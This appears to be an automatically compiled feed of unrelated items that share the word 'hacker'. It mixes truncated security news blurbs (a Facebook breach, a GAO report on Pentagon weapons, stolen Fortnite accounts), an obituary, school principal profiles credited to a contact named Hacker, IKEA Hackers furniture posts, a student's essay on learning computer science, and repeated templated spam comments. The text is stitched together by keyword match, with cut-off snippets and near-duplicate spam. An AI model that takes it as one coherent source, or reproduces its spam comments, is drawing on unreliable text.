The majority of applications being used today are SaaS (Software as a Service) solutions accessed via the cloud. The convenience of apps such as Google's G Suite, Salesforce, Basecamp and others brings with it the challenge of securing all the data being transmitted by millions of people every day. The growing demand for SaaS and cloud-based solutions is increasing opportunities for hackers to steal sensitive information. Recent high-profile security breaches include 2017's Equifax ...
Comment by Theo Prellwitz on "組長 Boss KUMICHO"
Hello! I know this is kinda off topic but I was wondering which blog platform you are using for this website? I'm getting sick and tired of WordPress because I've had problems with hackers and I'm looking at options for another platform. It would be great if you could point me in the direction of a good platform.
Comment on Hacker, Developer, User In Cydia, Which One To Choose? [Cydia "Who Are You?" Screen] by Qamar Hussain
What is the generation key for it? Can anyone tell me the key?
Comment on Hacker, Developer, User In Cydia, Which One To Choose? [Cydia "Who Are You?" Screen] by Yakser
I just want to be a user. Please help.
Russian-linked hackers are now operating in the shadows, report says
The infamous Russian-linked hacking group, best known for carrying out a series of high-profile cyber attacks against the Democratic National Committee, is now operating in the shadows. Veuer's Chandra Lanier has the story.

Reported by USATODAY.com 28 minutes ago.
Fighting Cheaters in Fortnite, Epic Games Acquires This Company

Liputan6.com, Jakarta - If you often play games, you are surely familiar with cheaters, players who play dishonestly. As a result, the more popular a game is on the market, the more cheaters it attracts.

Take for example the battle royale game that is popular right now, Fortnite.

Since its launch in 2017, Epic Games, as the developer, has worked hard to curb the number of players who cheat in the game.

Unfortunately, so far it has not succeeded. Undeterred, Epic Games decided to acquire an anti-cheat company called Kamu.

"Joining the Epic family is a childhood dream come true, and we are excited to help game developers tackle cheaters in their games," said Kamu CEO Simon Allaeys, as quoted by Ubergizmo on Wednesday (10/10/2018).

Epic Games CEO and founder Tim Sweeney also welcomed Kamu joining his company's extended family.

Sweeney said, "the Kamu team and its tools are key to delivering the best and fairest experience for all loyal Fortnite players."

Offering Its Services to Other Companies

Fortnite on the Galaxy Note 9 (Liputan6.com/ Agustin Setyo W)

Before joining Epic Games, Kamu already supplied its anti-cheat service to a number of other games and companies.

Although it has been acquired by Epic Games, the Helsinki, Finland-based company will continue to offer its services to other game companies.

Hackers Are Openly Selling Stolen Fortnite Accounts on Instagram

Fortnite has now arrived on iOS (source: Epic Games)

Earlier, Motherboard published a report on the many hackers selling Fortnite accounts on Instagram.

As quoted by Softpedia on Thursday (4/10/2018), it turns out there are several Instagram accounts selling goods stolen in cyberspace, one of which is Fortnite accounts.

Yet Instagram had never before been an attractive platform for these cybercriminals.

However, content moderation that is looser than on other social networks has led criminals to turn Instagram into a new marketplace.

(Ysl/Jek)


The Complete Guide to Crowdsourced Security Testing

The old way of doing security has failed, and more organizations are starting to trust crowdsourced ethical hackers to help with the growing demands of cybersecurity in a world that is technologically complex and increasingly threatened. As Crowdsourced Testing Solutions, including bug bounty programs, vulnerability discovery and hacker-powered penetration testing solutions have become viable options for a growing number of security leaders in recent years, defining the landscape and describing the differences and evolution of different offerings is overdue. 

We have based the analysis in this report on the data we have gathered through thousands of tests over the last few years, including hacker demographics, hacker activity, vulnerabilities found, vulnerabilities not found (but searched for), customer demographics, customer asset data and the security of those assets over time.

Apple denies report about spy chips
In a letter to the US Congress, Apple has rejected the report about spy chips from China that the company allegedly discovered. According to a US news agency, Chinese military hackers succeeded in spying on Apple's servers.
Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR
HACKER, Stanley E.
HACKER, Stanley E. Age 78, passed away on Sunday, October 7, 2018, at Hospice of Hamilton. He was born on May 22, 1940 in .....
          "At its peak, Apple was seeing 60% of warranty repairs in China and Hong Kong as being fraudulent, literally costing Apple billions of dollars per year"      Cache   Translate Page      
9to5:
Initially, Apple stopped allowing walk-in repairs and required reservation systems that supposedly ensured proof of ownership was provided. The system was beaten by hackers who exploited vulnerabilities in the web system and sniped all the time slots.

Apple then required candidate iPhone devices to run software diagnostics which would identify any fake parts inside, without requiring store staff to disassemble components and perform inspections. The thieves circumvented this by simply making the iPhones not turn on.

Some criminals were even more sophisticated.

Social Hackers Academy: Today's refugees and unemployed, tomorrow's programmers - [Epixeiro]

The first coding school in Greece that helps with the social integration of the unemployed, refugees and vulnerable groups, offering direct access to the labour market. Social Hackers Academy is a non-profit company based in Athens that was created by three co-founders (Δαμιανός Βαβανός...


Anon is a Hacker
Who is this 4chan?
Senior Consultant, Red Team - Deloitte - Montréal, QC
We’ve already performed hacking for our clients world-wide and in all industry sectors, and we’re now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT - View all Montréal, QC jobs
Growth Hacker - KLF Group - Montréal, QC
Experience with growth hacking tools. We're looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT - View all Montréal, QC jobs
Gray Hats: Cybersecurity Pros Straddle Good and Bad Hacking Practices
juliet.vanwage… Mon, 10/08/2018 - 16:12

Are cybercriminals winning? That was the question posed by Marcin Kleczynski, founder and CEO of Malwarebytes, during his presentation “Is the New Cybercriminal Mafia Winning? Recruitment, Retention and the Hire” at Cyber Security Chicago on Sept. 26, 2018. This presentation, along with the recent release of an Osterman Research white paper titled “White Hat, Black Hat and the Emergence of the Gray Hat: The True Costs of Cybercrime,” sponsored by Malwarebytes, paints a troubling picture of the current state of cybersecurity, the cybersecurity profession and the resulting costs to organizations.


Cybersecurity Budgets on the Rise for Businesses

Large organizations in the U.S. were queried by Osterman Research in 2017 about their then-current security budgets and their projected 2018 budgets. These companies reported a 21.2 percent increase in spending from 2017 to 2018, averaging growth from $697,000 to $845,000.

“Cybersecurity has become a board-level discussion,” says Kleczynski. “With all of these breaches in the news, I’ve seen chief security officers come to board meetings with articles printed out, showing the board members and CEOs what could possibly happen.”

This increase is promising for security teams, which have traditionally been an afterthought in the corporate budget hierarchy. But it can also be a bad sign for businesses, reflecting an increase in cyberthreats and a growing need to address them.

“While security budgets are increasing, the amount of security needed to protect an organization is increasing, as well,” Kleczynski explains.

Breaches and Remediation Continue to Cost Companies

When you take a closer look at where that budget is going, these organizations spent 14.7 percent of it addressing active compromises, according to the report. This refers to costs associated with day-to-day remediation, fixing active breaches caused by phishing attacks, malware and the like.

“Nearly 15 percent of these budgets are being spent on remediation,” Kleczynski says. “They spend all of this money on prevention, and yet 15 percent is still being used to remediate. So, this raises an interesting issue: Is protection just never enough and remediation is always necessary? Or do businesses need to reinvest more money into protection in the first place?”

The survey also asked about a hypothetical catastrophic security event, such as a widespread ransomware attack. The survey results calculated that these companies would spend an average of $429,000 to remediate such an event. That’s more than 50 percent of their projected 2018 budgets. This heavy cost factors in a variety of expenses tied to major event remediation: direct IT and labor costs, software and hardware solutions, direct costs such as paying a ransom, fines and legal fees.

And, make no mistake, catastrophic breaches are going to happen. The survey reveals that these organizations experienced an average of 1.8 major security events in 2017 — with the U.S. seeing nearly three times as many attacks, on average, as European countries. Budget allocated for catastrophic remediation will not go untouched.


Calculating the Total Cost of Cybercrime

Security budgets are rising, but it still may not be enough to cover the cost of breaches and mitigate growing risks. The survey also looked at the cost to an organization of directly dealing with cybercrime, breaking down costs into three areas: the security infrastructure itself, the off-budget costs tied to major security events and costs tied to insider threats:

  • $1.9 million: total costs for U.S. organizations
  • $697,000: total infrastructure costs
  • $759,000: total remediation costs
  • $440,000: total insider-threat costs

According to these cost breakdowns, there is a significant gap between what organizations are budgeting to address security ($845,000) and what they are actually paying ($1.9 million); not even half of the total costs of cybercrime are covered.

The Rise of the Gray Hat Hacker

Insider threats, specifically black hat activity, represent a notable portion of cybercrime. Among U.S. cybersecurity professionals, 50 percent have known someone who has participated in black hat activity, and 22 percent have been approached about engaging in it. One in 20 of the surveyed cybersecurity professionals identified themselves as gray hats — holding down a white hat job as a professional while also engaging in black hat activity on the side.

Much of the motivation of gray hats lies in the belief that it’s easy to engage in cybercrime without getting caught or prosecuted.

“A lot of cybercriminals aren’t being prosecuted very vigorously,” says Kleczynski. “There were only 47 prosecutions in the U.K. last year under the Computer Misuse Act.”

The other obvious motivation is money: There’s greater financial opportunity wearing a black hat than there is wearing a white hat.

“Part of the problem is a lot of companies are not paying their cybersecurity professionals enough, or they’re not giving them enough challenging tasks. They’re not being engaged,” says Kleczynski. “If you put a more lucrative package in front of them, with very little risk of being caught or prosecuted, it’s understandable that they will consider it.”

This makes for an interesting dynamic within the cybersecurity profession at the moment, Kleczynski notes. On one hand, there is a shortage of security professionals and security is only growing as a driver and concern within the corporate world. On the other hand, budgets do not align with the reality of cybersecurity needs. Companies have not yet come around to seeing the connection between the risks they are facing and the need to put out money for security talent to protect them.

“The situation is odd, because you have a massive shortage of personnel in the white hat industry, so companies should be paying for top talent and retention, but they’re not,” says Kleczynski. “That dynamic is not sustainable.”


No Personal Injury Coverage for Payment Card Breach Because Damages Resulted from Hacker's Criminal Conduct, Not Insured's Data Security Practices
A Florida federal district court has ruled that a claim asserting that an insured's negligent data security practices led to a payment card breach did not trigger personal injury coverage under a CGL policy. See St. Paul Fire & Marine Ins. Co. v. Rosen Millennium, Inc., No. 6:17-cv-540-Orl-41GJK (M.D. Fla. Sept. 28, 2018). The court...
io9 James Gunn Is Moving to DC and Is in Talks to Write the Next Suicide Squad Film | Jalopnik Most

io9 James Gunn Is Moving to DC and Is in Talks to Write the Next Suicide Squad Film | Jalopnik Most Hated Car on the Internet Defeated By Intersection | Kotaku Sources: Microsoft Is Close To Buying Obsidian | Offspring Read These Redditors’ Parenting Tricks That Backfired | The Takeout Conspiracy theories abound after DiGiorno frozen pizzas spotted…



Stop and Ask: Why Does Google Need Hardware? - Washington Post

So many internet and software companies make gadgets now. Amazon, Microsoft, Google and Facebook all make some type of internet-connected computing gear. Even Uber has started to engineer its own electric scooters. The one thing all these ...
What Drives Tech Internet Giants To Hide Data Breaches Like The Google+ Breach - Forbes
Google's Home Hub is Missing a Camera. Here's Why That's a Smart Idea - TIME
Google takes on the iPad Pro and Surface Pro with the Pixel Slate - Mashable
Lifehacker - NDTV - Telegraph.co.uk - The Independent

An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider

A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to act - TechCrunch

HOAX AND SCAM: Have you received an HSE24 refund? Dangerous SMS, here is the message

A dangerous SMS appears to be circulating today, October 9, telling us about a supposed refund from HSE24, the well-known online platform that has a great many subscribers in Italy and which in these hours appears to be the indirect victim of a hacker attack, at least according to reports about the message spreading rapidly across our country. Going into more detail, it emerges that the company ...



Hackers Targeting Instagram Accounts of Influential Profiles for Ransom in a Recent Campaign

High-profile users and big shots should now be prepared to safeguard their Instagram accounts, as hackers are targeting the Instagram accounts of influential profiles. The hackers are also demanding a hefty ransom after hijacking the Instagram accounts.

 

...

Read the rest of: Hackers Targeting Instagram Accounts of Influential Profiles for Ransom in a Recent Campaign


Illinois braces for another Russian attack on its election systems
The frontline in the war between foreign hackers and U.S. election officials is an office in a Springfield, Illinois strip mall.
Dr. Laura Rosenbach: The students and staff make Hough a special place
Contact: Hacker, Brian

On Sept. 12, the staff at Hough High had a staff luncheon after students' early release. Principal Dr. Laura Rosenbach was completely surprised when Northwest Learning Community Superintendent, Dr. Matt Hayes, showed up with balloons and an announcement. Dr. Rosenbach was named Northwest Learning Community Principal of the Year.

"Laura has a phenomenal distributive-leadership structure design for the adults in her building," said Dr. Hayes.  "This structure drives a positive learning environment for all of her students while preparing her staff for future leadership opportunities."

Dr. Rosenbach was "truly shocked" to learn she'd been honored by her fellow principals. "I have so much respect for my peers," she said. "They are doing phenomenal things in my school. I know how hard they work so this means a lot."

A native of Gettysburg, Pa., she earned her bachelor's degree at Davidson College and her master's and doctorate from the University of North Carolina at Charlotte. "I always knew that I wanted to be a teacher," said Dr. Rosenbach. "I taught civics and economics and I loved it."

She joined CMS 19 years ago. She was a student teacher and then teacher at Vance High. She became an assistant principal and helped open Mallard Creek High, where she worked for three years. She was the principal of Bradley Middle and then became Hough principal six years ago.

"Hough is an amazing school," said Dr. Rosenbach. "The students and staff make Hough a special place. Students inspire me with what they do and how much they care about each other and how much effort they are willing to put in. I feel very inspired by watching our students."

Dr. Rosenbach credits the staff at Hough for helping her earn Principal of the Year honors for their learning community. "This award is really for all of my staff," she said. "They are hard-working and deserve to be recognized for everything they do."

Because she was a principal at Bradley Middle, Dr. Rosenbach has been able to follow some of her students from middle school through high school. "I had about 100 students from sixth through 12th grade and it was so fun to watch them find their talents and themselves," she said. "It was so cool to be there for their first orchestra concert and there for their last."

Watching students' growth is one of the things Dr. Rosenbach really enjoys about teaching high school. "You get to see students at an age where they have fully discovered their passions and strengths," she said. "You get to watch and support them as they flourish. Whether that is in forensic science, JROTC, sports or poetry, you get to see them at their best and have really great conversations with them about their future plans."

Rosenbach works closely with her seniors. "I work with them to make sure that they get to shake my hand in June," she said.

Byline: Northwest Learning Community Principal of the Year
Article Date: 10/3/2018

Dr. Timisha Barnes-Jones: I want to be a champion for those that don't have advocates
Contact: Hacker, Brian

West Charlotte High Principal Timisha Barnes-Jones was stunned to learn she was chosen as Principal of the Year for the Central 1 Learning Community.

"I'm really humbled and feeling very blessed," said Dr. Barnes-Jones. She has been an educator for more than 21 years, 19 of those with Charlotte-Mecklenburg Schools.

Barnes-Jones' ability to lead with heart and hard work led to her selection. Dr. Denise Watts, Center City 1 learning community superintendent, said Barnes-Jones' leadership has led to "significant changes to student and staff culture, reviving school pride and cultivating an environment in which students and teachers now thrive."

"Dr. Barnes-Jones is a powerful example of heart-centered leadership," Watts said. "With a perfect blend of heart, strategy and instructional aptitude, she has been able to attain transformational outcomes for students at West Charlotte." Watts cited as examples a rise in the graduation rate and the steady climb in student performance on state tests.

Barnes-Jones, a Kannapolis native, was lured to the cafeteria for what she thought was a student situation. Instead, she was greeted by students, staff and learning community staff.

"From the time she was really two years old, we recognized a special gift in her," said Barnes-Jones' mother, Mary Barnes, a retired educator from Kannapolis City Schools. Barnes said her daughter began singing publicly at age 9 and that she has performed for dignitaries, as well as in "The Color Purple."

Barnes-Jones applied her talent to the education field, teaching music at Winterfield Elementary, Highland Renaissance Academy and Phillip O. Berry, Olympic and Independence high schools before moving into administration. She has a bachelor's degree in music from Davidson College, a master's degree in education from the University of North Carolina-Charlotte and a doctorate in educational leadership from Gardner-Webb University.

She began her tenure at West Charlotte as an assistant principal after working at E.E. Waddell and Vance high schools. She became West Charlotte's co-principal in 2013 when the school had two campuses and took the helm the next year.

Barnes-Jones said she became a principal because she wanted to have an impact on the lives of students.

"I want to be a champion for those who don't have advocates, to expand my reach from the classroom and create a culture where we're seeing the light bulbs go off," she said. "Some students are one caring adult away from being a success. I had those people who believed in me and I'm happy to give back in that way."

Barnes-Jones said she has always believed in West Charlotte's potential for success and that giving students the right environment would yield positive results. According to the most recent data, the school improved from a grade of D to C in one year and showed an increase in college and career readiness. During her tenure at West Charlotte, graduation rates have improved by over 54%, and in 2017 West Charlotte was removed from the recurring low-performance school list and designated a school of high growth by NC.

For the past 3 years the school has celebrated Decision Day, which recognizes students who are going on to 36 colleges and three branches of the military. This year she launched four career academies and improved AP enrollment by 88%.

"They are seeing they can achieve at high levels," Barnes-Jones said, "and they have real options for the 21st century."

Byline: Central 1 Learning Community Principal of the Year
Article Date: 10/3/2018

Merita Little: "My journey happened because I met a little boy"
Contact: Hacker, Brian

After Hurricane Florence, principals were asked to walk around their campuses and check for damage. Southwest Learning Community Superintendent Dr. Steve Esposito went to Steele Creek Elementary to help Principal Merita Little look at her school.

"We were walking and my assistant principal, Brian Spaulding, came over to tell me that there was a leak on our auditorium stage," said Little.

She ran to the auditorium and got on the stage, looking up to find the leak. "I was so absorbed in what I was doing, I didn't realize that the gym was full of students," she said. "It took me a few minutes to figure out that there was no leak."

The whole thing was a ruse so that Dr. Esposito could tell Little she was named the Southwest Learning Community Principal of the Year. "It was pretty crazy," said Little. "I know I work in a learning community with many strong principals and it's great that my peers think enough of me for this honor. I love what I do. This has been my life for so many years."

Dr. Esposito said Little was an excellent choice. "She is a talented instructional leader and, best of all, she is an amazing person," he said. "She leads with her heart, yet demonstrates strategic leadership at Steele Creek Elementary by creating systems and processes that are supportive of students and teachers alike. She engages parents and community organizations as a means to support students in the classroom, beautify her campus and celebrate her staff."

Little said the recognition is appreciated, but she feels that her real prize comes from her daily work. "I can't wait to get to work every day. There aren't many people who can say that. Regardless of the outcome, I already feel like a winner. My relationships with my students and staff have made me become a better person."

Becoming an educator was not something that Little planned to do. She was raised in Pawling, N.Y. and went to school there until her grandmother became ill. Her entire family moved to coastal North Carolina to care for her. Little developed a love for the state and attended North Carolina Agricultural & Technology State University. She planned to go into marketing and even participated in training at a bank in Charlotte. "We were walking as a group in the office and I said hello to the custodian," she said. "I was immediately reprimanded and told, 'We don't speak to the help.' I realized then that this was not the job for me."

While she was trying to figure out her future plans, she visited her sister, who was a special education teacher in Syracuse, N.Y. She helped out in her sister's classroom and started to develop a passion for education. "My journey happened because I met a little boy," she said. "There was a little boy named Steven. I always wanted to change the world and I realized I could do that in the classroom."

Little decided to return to Charlotte to earn her teaching certificate. She also received her master's degree from Gardner-Webb University.

Little went to Huntingtowne Farms Elementary and met with then-principal Dr. Robert Cannon. "I told him I wanted to be a teacher and I wanted to learn how from the ground up." She started as a teacher assistant, then became a teacher, then a literacy facilitator.

Little thrives on the diversity of the Steele Creek community. "We have children from all over the globe. The entire school works really hard to develop relationships with our families."

When Little was a child, her mother volunteered as an adult literacy instructor. As a child, Little would read with some of the students and was slightly confused when they struggled with words she knew. "I asked my mother why they couldn't read and she promised me one day, I would understand," she said. "And now I do. And I get to make a difference."

Byline: Southwest Learning Community Principal of the Year
Article Date: 10/3/2018

Mark Bosco: "Education is a way of life"
Contact: Hacker, Brian

Mark Bosco, principal at Myers Park High, was told that he needed to appear on the school's morning announcements to present an award to his media specialist. Bosco was ready to go when he noticed Central 2 Learning Community Superintendent Tara Lynn Sullivan in the corner with an elaborate arrangement of candy bars. Sullivan was there to tell Bosco he was the Central 2 Principal of the Year.

"It really was a total surprise," said Bosco. "It is especially nice to be recognized by your peers. They are in the trenches with you and doing the work. They know what the demands are. So this recognition means a lot."

Bosco joined CMS 22 years ago as a teacher at Northwest School of the Arts. Throughout his career, many signs pointed him towards working at Myers Park.

His mother, a high school principal, was mentored by one of her former principals, Jim Amendum. He was the principal of Myers Park; he mentored Bosco and helped him get his first teaching job at CMS. Bosco was also coached by Charles LaBorde, another Myers Park principal, who started the school's IB program.

"It is so great to be part of these continuing legacies," said Bosco. "Last year, we celebrated the 25th anniversary of Myers Park's IB program and it was so exciting to have LaBorde there with us as my mentor. I am honored to be the steward of the IB program."

After graduating from Hartwick College in New York, Bosco was unsure of what career path he wanted to take. His mother encouraged him to pursue his passions: politics, history and working with kids. His mother's strong focus on education made an impact on him.

"The care that she put into working with her kids appealed to me," he said. "My dad was an attorney. That was a job. My mom didn't have a job. She had a passion. Education is a way of life. It was the way she lived her life. I saw her give everything. I wanted to follow her lead and give back with a spirit of service."

Bosco said the unique community at Myers Park is one of the best things about his job. "We have a special community here," he said. "We serve some of the most affluent students and some of the poorest and we love the challenge. We want to meet the needs of all our kids."

Myers Park has earned many accolades for academic excellence, but Bosco says the culture of the school and community are just as important. "We are purposeful about the way we serve kids," he said. "The lives of our students and staff are complicated, but helping all children meet their needs is not."

The school recently had a day, the Mustang Stampede, dedicated to encouraging students to sign up for clubs and get involved in the school. "To have our kids engaged and feeling confident is just as important as test scores."

Bosco enjoys living and working in the Myers Park community. His wife is a guidance counselor at Charlotte Country Day and he says they are very involved in their community. "I love that we are part of this community," he said. "Sometimes it is challenging when you go to the pool and parents want to talk to you, but it's all about investing and being involved."

Byline: Central 2 Learning Community Principal of the Year
Article Date: 10/3/2018

Tracey Pickard named principal at Hopewell High School
Contact: Hacker, Brian

Tracey Pickard has been named as principal at Hopewell High effective October 8. Pickard replaces John Gisiano who resigned Aug. 7, 2018.

Pickard has held a variety of positions within Charlotte-Mecklenburg Schools. She has been principal at Charlotte-Mecklenburg Virtual High since 2016. She has also been a principal at Performance Learning Center, where she was a Principal of the Year finalist, and Hawthorne Innovative Cooperative High. Pickard has held other positions in CMS, including area administrator, assistant principal, principal in residence and school counselor.

"With the experience Tracey Pickard has in CMS and a track record of accomplishment for students, we have every confidence that Tracey will be a wonderful leader for the students, staff and families of the Hopewell High School community," said Dr. Clayton Wilcox, superintendent of CMS.

Pickard earned her bachelor's degree in school administration – elementary education and master's degree in counseling and development from Winthrop University. She also earned a master's degree in school administration from the University of North Carolina at Charlotte.

Article Date: 10/3/2018

Facebook discovers a security breach: is your account affected?

2018 is an annus horribilis for Facebook. The social network announced this Friday that an attack on its network exposed the data of almost 50 million users. According to the New York Times, the company discovered the problem during the week. The attackers exploited a coding flaw that gave them access to these millions of accounts and allowed them to take control of users' accounts. Facebook issued a statement saying that it has identified the flaw and has notified law enforcement. "On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts. We are taking this very seriously and want to let everyone know what happened and the immediate steps we have taken to protect people's security. Our investigation is still in its early stages," the company says.

Facebook also believes that a further 40 million accounts could be affected. "We are also taking the necessary precautions to reset the access tokens of an additional 40 million accounts that were subject to a 'View As' look-up in the last year." "View As" is a feature that lets users see what their own profile looks like to others. "If you have been logged out of your account and asked to log back in, it is because we discovered a security issue and are taking immediate steps to protect people on Facebook. As a result, around 90 million people will now have to log back in to Facebook, or to one of their apps that use Facebook Login. After logging back in, users will receive a notification at the top of their News Feed explaining what happened," Facebook says. This is another disappointment for Facebook, which has already suffered the Cambridge Analytica scandal and is seeing 25% of its members in the United States turn away from it.

For Giovanni D'Agata, president of the "Sportello dei Diritti", this is once again proof that no one is immune to cyber attacks. Our concern is that the privacy and security of citizens not be compromised any further.

Giovanni D'AGATA


The 5 Most Important Announcements from Google's Pixel Event

Google events don’t typically elicit the same amount of fanfare as Apple’s do, but the announcements are just as enticing for both enthusiasts and anyone who likes shiny new things. This year, in an event held in New York City, the company revealed its new Pixel phones, a redux of the Pixel tablet (now with Chrome…



How to Get a Refund on an Airbnb Stay Gone Awry

If you think too hard about the sharing economy, things get weird. We’re perfectly willing to get in a stranger’s car (Uber) or stay in a stranger’s home (Airbnb)—both of which we can arrange via smartphone app. These services offer certain trust markers, like verification and user reviews, but that doesn’t guarantee…



Speak to Your New Baby the Way You'd Speak to Your Older Kids

As I prepare for life with a new baby, I’ve been hearing a lot of advice on how to help my five-year-old daughter Maggie transition into her role of a big sister, a title she’s not entirely thrilled about. “Read her some big sibling books,” people say. (Done.) “Let her help out.” (Definitely.) “Get her a gift ‘from…



How to Divest from the Companies Killing the Environment

Unless humans transform the economy in such a way that has “no documented historic precedent,” the earth will experience “worsening food shortages and wildfires, and a mass die-off of coral reefs as soon as 2040,” according to a report published Monday by the United Nation’s Intergovernmental Panel on Climate Change.…



Learning how to learn: CS Edition

I never thought I would be a Software Engineer. Back when I was little I had the firm conviction that I would be an Architect, but something happened... I realized that the more I grew up, the more interested I became in computers. After my third semester of high school (I live in México, and in my state public high school lasts 4 semesters) I came to an answer: I had decided to do a BS in Computer Science.

Let's go forward 4 months after I started university. It was the end of my first semester in school (2015, 3 years ago), I had just 4 months of experience coding, my first programming class was object-oriented programming, and the deadline for my first final project in my CS degree was 1 week away.

An ERP system to manage the students, professors, classes and schedules of a university using a MySQL database.

I wanted to cry. Like, literally. It was my first project in my CS career and I was stuck. What is a database? What is SQL? What is a non-relational database? What is a database management system? How can I connect my Java code to a database? I had a lot of questions like those; I had no experience and no idea how to do those things.

Of course, I could have just copied code from Stack Overflow or pages like that, but I NEEDED to know how things work. For me, copying is just not enough. I was trying to finish the project, doing everything from scratch and on my own.

I remember those nights of searching online through lots of videos, web pages, books, everything... only to bring new questions to my head. I was totally lost. Searching the web was just doing me harm: Computer Science is an ocean of information and I was in the middle of that ocean with no clue where I was, what to do or what information to search for.

Our team finished the project with the help of other students from higher semesters.

I still remember the feeling. The sensation that you know nothing, that even if you put all your effort into searching for information you don't understand anything; everything seems to be written in a foreign language (actually it was, everything was in English, but you get the point).

Even 6 months later, after a C programming class, searching how to do web programming was like... wait, what the hell is a framework and why do people recommend tons of them? What is Django? Backend? Frontend? What is the difference between a framework and a library? Maybe I was too slow, but that was a lot of information for me.

So I don't know if it was just me or if everyone feels this way at the beginning, but I was very lost. I had the wish to learn more, but trying just left me with more questions.

Do I still feel the same?

No. Absolutely not. I think that at some point in my degree I learned how to learn. This is a very important skill, because as a Software Engineer you need to stay up to date with new technologies and you need the ability to learn new tech and tools as you walk through your career.

Maybe, eventually, everyone gets to this point. The point where you can confidently read any documentation online and pick up a new language. The point where you can read about new tech without being completely lost. The point where you can learn whatever you want online, just with a little patience.

But maybe not; maybe some people get so frustrated that they decide to quit CS, maybe some people will convince themselves: "This is not for me". If you are getting to that point of frustration, let me tell you something: you are not alone, everyone in the developer community is here to help you.

Do Not Give Up.

The next tips are for you. I want to share some of my little experience as a CS student on how to start diving into this beautiful ocean of knowledge. Keep in mind that these tips were the little things that helped me become a better learner; they may not be useful for your situation because we are all different.

Ask for help

Maybe it sounds obvious, but it is not. Sometimes our pride doesn't let us ask for help, even though it is a normal and healthy thing to do.

Don't expect someone to give you all the answers. Ask for advice, ask about experiences, try to understand how they learned what they know, try to figure out what you need to start studying to get to the level where they are. Ask for advice on how to start tackling all the information that is out there.

Be Social

Going to Campus Party México (a tech convention full of conferences) has been one of the best experiences of my life. I spent 8 hours traveling on a bus with a bunch of strangers across the country just to meet new people and learn all that I could about technology.

Talking to all the devs, the hackers, the creative people and even the business people helped me grow in an incredible way.

Having conversations with people who have more experience than you is like reading a good book. It's amazing. You get to hear experiences that will help you through your journey; knowing what is going to come and how they faced those situations is a great opportunity to think about how you could react to similar situations. You start to discover a lot of things you were unaware of.

Math is fun

Not everybody thinks this way but I do.

Having a good background in math is very helpful for every programmer. Probably in your daily work you will not use derivatives and integrals, BUT algebra, calculus, probability and geometry will give you an excellent sense of logic.

I am not saying that you have to be good at math to be a good dev. My point is that, in my case, I can see a relation between having more ability in math and having more understanding of how a computer works and more ease writing code.

Read, Read and Read

Reading is fundamental for your development. Articles like the ones you can find here or on any development site are very helpful.

Be a proactive student; don't be satisfied with the information you get at school, in the bootcamp or in the online course.

You need to be hungry for information. Time is not an excuse: I read "Clean Code" by Robert C. Martin between my uni classes even though I work half-time as a web dev.

If I can do it, you surely can.

Make CS an important part of your life

A few months into my degree I realized that making CS a constant topic in my life (and I am not including my "academic life" here) was a great way to learn about small topics in a fun and fast way.

When I say "make CS an important part of my life" I am referring to little things like following YouTube channels about CS, following devs on Twitter, going to tech conferences, making CS a topic of conversation with other devs/classmates instead of talking about last night's episode of -insert favorite show-, and even talking with my uni professors about their experience in the tech industry.

I am not saying that you should leave all your hobbies to live a 100% software engineering life. I am saying that you should consider CS as another hobby in your life.

It's okay if this is too much CS for you; some people prefer to think about these things only during their work time. But if you are like me and you absolutely LOVE coding and learning new things about tech every day, you should consider this advice.

Do not stress out

This point is very important. Always keep calm.

NO ONE knows everything, so keep calm. It is okay if you don't understand some topic, it is okay if you don't understand some tech, and it is okay if you just don't 'feel like' learning it.

I used to stress out a lot because my skills in web development (especially front-end) are not the best out there, but after some time thinking about what I really want in my life I realized that web development is just not my thing.

So, after all, there was no point in getting stressed because I didn't know the latest JavaScript framework or how to do good front-end design if at the end of the day I was going to pursue the low-level programming and algorithms path.

Those were some aspects of my life as a student that helped me learn more and faster. Maybe those points don't apply to you, but I feel the need to bring new ideas to the discussion, because after all, communities like this one helped me in my introduction to this industry.

Sometimes you can feel down, sometimes you can feel that your productivity levels are really low and that you are not learning anything, but let me say this to you: eventually everything gets better; just keep going, keep learning, keep putting effort into what you want.

"Everything in this life has a fix, except death." So enjoy your life learning what you love.

Thank you for reading ~


Comment by minecraft free download 2018 on "Wire connections using plug-in connectors and ring sleeves"
Hey there! I know this is somewhat off topic but I was wondering which blog platform you are using for this website? I'm getting fed up with WordPress because I've had problems with hackers and I'm looking at options for another platform. It would be fantastic if you could point me in the direction of a good platform.
WhatsApp fixes bug that let hackers take over app when answering a video call
Bug only affects WhatsApp for Android and iOS, but the issue has been fixed this week.

Sunsetting Google Plus
Ben Smith (Hacker News): The review did highlight the significant challenges in creating and maintaining a successful Google+ that meets consumers’ expectations. Given these challenges and the very low usage of the consumer version of Google+, we decided to sunset the consumer version of Google+. To give people a full opportunity to transition, we will […]
Headboard with lights feat. LINNMON table top

Here is my latest hack: A headboard with lights (backlit) made out of an IKEA LINNMON table top. The wall behind my bed was starting to turn dirty and wanted a nice cheap headboard to match the rest of the bedroom deco. Materials: 1 x 150cm LINNMON table top, I chose white as it felt […]

The post Headboard with lights feat. LINNMON table top appeared first on IKEA Hackers.


HEKTAR wall lamp in Wood and Steel

When decorating the living room in our new house, my wife and I searched for a wood/steel combination wall lamp. We did not find exactly what we wanted, or we declared it way too expensive, but the HEKTAR design from IKEA did have the shade form we liked. So I decided to […]

The post HEKTAR wall lamp in Wood and Steel appeared first on IKEA Hackers.


Comment on "How tall is Ruben Cortada" by cheap divorce
Hi there! I know this is kinda off topic but I was wondering which blog platform you are using for this website? I'm getting fed up with WordPress because I've had problems with hackers and I'm looking at alternatives for another platform. It would be great if you could point me in the direction of a good platform.
Comment on DSC_1320 by vinyl gate
Hello! I just wanted to ask if you ever have any issues with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no backup. Do you have any solutions to stop hackers?
What Drives Tech Internet Giants To Hide Data Breaches Like The Google+ Breach (Forbes)

